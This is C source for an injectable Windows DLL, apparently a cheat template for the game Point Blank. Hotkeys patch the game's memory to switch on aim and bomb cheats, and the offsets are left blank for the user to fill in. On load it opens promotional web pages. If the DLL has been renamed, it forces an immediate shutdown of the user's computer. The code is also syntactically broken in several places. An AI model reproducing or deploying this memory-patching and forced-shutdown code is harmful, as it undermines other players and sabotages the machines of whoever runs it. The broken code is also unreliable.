#include <windows.h>
#pragma warning(disable: 4700)
LPTSTR PBlankExec = "PointBlank.i3Exec";
DWORD Gravity, adrSpeed, dwI3EXEC, adrProteck, adrRep, adrBrutal, ofsMNZ1, dwBase, Change, CheckProtection;
void AndiAmoes(void *adr, void *ptr, int size)
{
DWORD CheckProtection;
VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &ofsMNZ1);
RtlMoveMemory(adr,ptr,size);
VirtualProtect(adr,size,CheckProtection, &dwBase);
}
int SS = 0;
int BB = 0;
int __fastcall LagiSakit(void)
{
return 0;
}
BOOL Amoes(unsigned long ADRexec, int OFSexec, int PTRexec)
{
if (!IsBadWritePtr((void*)ADRexec, sizeof(unsigned long)))
{
if (!IsBadWritePtr((void*)(*(unsigned long*)ADRexec + OFSexec), sizeof(unsigned long)))
{
*(int*)(*(unsigned long*)ADRexec + OFSexec) = PTRexec;
}
}
return (0);
}
DWORD WINAPI AMOESHacX(LPVOID param)
{
while(1)
{
//======================================
LagiSakit();
//==================================================================
if (GetAsyncKeyState(VK_F1)&1){
DWORD Pasang =(DWORD)GetModuleHandleA("PointBlank.i3exec")+0x000000;//Cari Offeset sendiri yoo
DWORD Defuse =(DWORD)GetModuleHandleA("PointBlank.i3exec")+0x000000;//Cari Offeset sendiri yoo
AndiAmoes((void *)(Pasang),(int*)(PBYTE)"\x00\x00\x00\x00",4);// cari byte sendiri yoo
AndiAmoes((void *)(Defuse),(int*)(PBYTE)"\x00\x00\x00\x00",4);// cari byte sendiri yoo
MessageBeep(MB_ICONINFORMATION);
LagiSakit();
}
//==============================================================
if (GetAsyncKeyState(VK_HOME)&1){//AIM Datar ON
DWORD AIM =(DWORD)GetModuleHandleA("PointBlank.i3exec")+0x0000; //Cari Offeset sendiri yoo
AndiAmoes((void *)(AIM),(int*)(PBYTE)"\x00\x00\x00\x00\x00\x00\x00\x00",
;//cari Byte sendiri yoo
MessageBeep(MB_ICONINFORMATION);
LagiSakit();
}
if (GetAsyncKeyState(VK_END)&1){// AIM Datar OFF
DWORD AIM =(DWORD)GetModuleHandleA("PointBlank.i3exec")+0x0000; //cari offeset sendiri yoo
AndiAmoes((void *)(AIM),(int*)(PBYTE)"\x00\x00\x00\x00\x0C\x00\x00\x00",
; // cari byte sendiri yoo
MessageBeep(MB_ICONINFORMATION);
LagiSakit();
}
//====================================================
dwI3EXEC = (DWORD)GetModuleHandleA("PointBlank.i3Exec");
if(dwI3EXEC > 0){
DWORD adrBrutal = dwI3EXEC+0x0000;//Cari Offeset sendiri yoo
AndiAmoes((void *)(adrBrutal),(void*)(PBYTE)"\x00\x00\x00\x00",4); cari Byte sendiri yoo
LagiSakit();
}
//------------------------------------------------------------------------------
{
Sleep(0);
}
}
return(0);
}
//------------------------------------------------------------------------------
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpvReserved)
{
if(dwReason == DLL_PROCESS_ATTACH) {
char strDLLName [_MAX_PATH];
Sleep(200);
MessageBox (0,"Credit By : Andi Amoes","
AMOES HacX", MB_OKCANCEL | MB_ICONINFORMATION);
system("start
https://www.facebook.com/andi.amoes");system("start
http://www.amoeshacx.tk");GetModuleFileName(hModule, strDLLName , _MAX_PATH);
if (strstr(strDLLName, "AMOES HacX v6.2.dll") <= 0) {
MessageBox(0, "Eh Sempax Jangan Rename Dll", "Warning", MB_OK + MB_ICONSTOP );
MessageBox(0, "Good Bye~Bye
", "Warning", MB_OK + MB_ICONSTOP );
system("start C:/Windows/System32/shutdown.exe -s -f -t 00");
ExitProcess(0);
}
//------------------------------------------------------------------------------
CreateThread(0, 0, (LPTHREAD_START_ROUTINE)AMOESHacX, 0, 0, 0);
}
return TRUE;
}
//-------------------------------------------------------------------------
/*